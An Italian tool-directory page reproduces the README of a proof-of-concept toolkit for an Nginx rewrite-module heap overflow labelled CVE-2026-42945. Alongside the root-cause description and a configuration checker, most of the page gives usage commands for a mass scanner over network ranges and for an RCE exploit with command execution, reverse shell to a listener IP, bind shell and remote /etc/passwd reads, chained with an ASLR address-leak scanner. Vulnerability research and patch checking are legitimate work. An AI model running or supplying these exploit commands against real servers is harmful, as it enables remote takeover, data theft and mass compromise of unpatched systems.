Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
Strumenti/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebFuzzingPenetration TestingSviluppo PayloadBinary Exploitation
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

1163 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

CVE-2026-42945 Nginx Rift - Toolkit PoC

Un toolkit proof-of-concept completo per CVE-2026-42945 (Nginx Rift), una vulnerabilità critica di heap buffer overflow nel modulo ngx_http_rewrite_module di Nginx.


Riepilogo della Vulnerabilità

CampoDettagli
ID CVECVE-2026-42945
NomeNginx Rift
TipoHeap Buffer Overflow
Componentengx_http_rewrite_module
GravitàCritica (CVSS 9.2)
Versioni interessateNginx 0.6.27 - 1.30.0
Versioni corretteNginx 1.30.1 / 1.31.0

Causa Principale

La vulnerabilità è dovuta a un errore di calcolo delle dimensioni tra due passaggi interni durante l'elaborazione delle regole di rewrite. Se una configurazione utilizza:

  • Catture regex senza nome ($1, $2, ecc.)
  • Combinate con una stringa di sostituzione contenente ?

Nel primo passaggio Nginx calcola erroneamente la dimensione del buffer necessaria e, durante il secondo passaggio, scrive oltre il buffer heap allocato.

Esempio di Configurazione Vulnerabile

server {
    # VULNERABLE: Unnamed capture ($1) + '?' in replacement
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

Configurazione Sicura (Corretta)

server {
    # SAFE: Named capture (?P<path>) replaces $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

Componenti del Toolkit

1. nginx_rift_poc.py - Strumento PoC Principale

Scanner di vulnerabilità e strumento di sfruttamento per singolo target.

Caratteristiche:

  • Rileva la versione di Nginx dall'header Server
  • Verifica se la versione rientra nell'intervallo vulnerabile
  • Invia payload HTTP appositamente costruiti per attivare l'heap overflow
  • Genera configurazioni di test vulnerabili/sicure

Utilizzo:

# Detect version and test vulnerability
python nginx_rift_poc.py -t target.example.com

# Test with custom payload
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS target
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# Generate vulnerable test configuration
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# Generate safe (patched) configuration
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - Scanner di Massa

Scanner batch per testare più target contemporaneamente.

Caratteristiche:

  • Scansione multi-thread (50 thread predefiniti)
  • Elenco target da file o intervallo di rete CIDR
  • Output JSON per l'integrazione
  • Rilevamento automatico SSL per la porta 443

Utilizzo:

# Scan from target file (format: host:port per line)
python nginx_rift_scanner.py -f targets.txt -o results.json

# Scan single target
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# Scan network range
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# High-speed scan
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

Formato del file target:

# Comments start with #
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - Analizzatore di Configurazione

Analizza i file di configurazione Nginx locali per individuare pattern di rewrite vulnerabili.

Caratteristiche:

  • Analizza nginx.conf e segue le direttive include
  • Rileva catture senza nome con ? nelle stringhe di sostituzione
  • Supporto alla correzione automatica (con backup)
  • Scansione ricorsiva delle directory

Utilizzo:

# Scan single file
python config_checker.py /etc/nginx/nginx.conf

# Scan directory recursively
python config_checker.py -d /etc/nginx/conf.d/

# Auto-fix vulnerable patterns (creates .bak backup)
python config_checker.py --fix /etc/nginx/nginx.conf

# Auto-detect common Nginx paths
python config_checker.py

4. enhanced_poc.py - PoC RCE Avanzato

Strumento di exploit avanzato basato sulla ricerca ufficiale di depthfirst, con supporto di più pattern di rewrite e modalità di exploit.

Caratteristiche:

  • Auto-rilevamento di 8 pattern di rewrite vulnerabili comuni (/api/, /redirect/, /user/, ecc.)
  • Supporto di più caratteri trigger di overflow (+, &, =, %)
  • Generazione intelligente del payload con dimensione di overflow controllata
  • Più modalità di exploit: cmd / shell / bind / read
  • Indirizzi di base heap/libc personalizzati per ambienti con ASLR disattivo
  • Costruzione dinamica dello spray body con finto ngx_pool_cleanup_s

Utilizzo:

# Auto-detect patterns and version
python enhanced_poc.py -t target.example.com --detect

# Execute command (ASLR off)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# Reverse shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# Bind shell
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# Read remote file
python enhanced_poc.py -t target.example.com --read /etc/passwd

# Custom heap base (for ASLR-off targets)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# Use & as overflow trigger
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

Dettagli delle Modalità di Exploit:

ModalitàDescrizioneOutput
cmdEsegue un singolo comando shellOutput del comando sul target
shellAvvia una reverse shellSi riconnette a --listen-ip:listen-port
bindAvvia una bind shell sul targetIn ascolto su --listen-port sul target
readLegge un file dal targetContenuto scritto in /tmp/nginx_rift_read

Configurazione degli Indirizzi (solo ASLR disattivo):

  • --heap-base: Base heap del target (es. 0x555555559000)
  • --libc-base: Indirizzo di base di libc (es. 0x7ffff77ba000)
  • --system-addr: Indirizzo diretto di system() (sostituisce libc-base)

5. aslr_leak_detector.py - Rilevatore di Perdite ASLR

Scanner completo per rilevare perdite di informazioni in grado di aggirare la protezione ASLR.

Caratteristiche:

  • Rilevamento di perdite negli header HTTP (Server, X-Powered-By, ecc.)
  • Analisi delle pagine di errore per indirizzi di memoria e stack trace
  • Sondaggio di endpoint specifici di Nginx (/nginx_status, /actuator/*, ecc.)
  • Rilevamento di indirizzi di memoria esposti (puntatori a 64 bit, indirizzi heap/libc/stack)
  • Sondaggio del layout dell'heap tramite analisi dei tempi di risposta
  • Inferenza dello stato ASLR (attivo/disattivo/debole)
  • Integrazione diretta con enhanced_poc.py tramite report JSON

Utilizzo:

# Scan single target
python aslr_leak_detector.py -t target.example.com

# Scan with SSL
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# Scan from file, save report
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# Scan network range
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# Quick scan mode
python aslr_leak_detector.py -t target.example.com --quick

Integrazione con il PoC Avanzato:

# Step 1: Detect leaks
python aslr_leak_detector.py -t target.example.com -o leak.json

# Step 2: Use leaked addresses for exploit
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

Indicatori di Rilevamento della Vulnerabilità

Lo strumento PoC identifica la vulnerabilità tramite questi indicatori:

Scarica lo strumento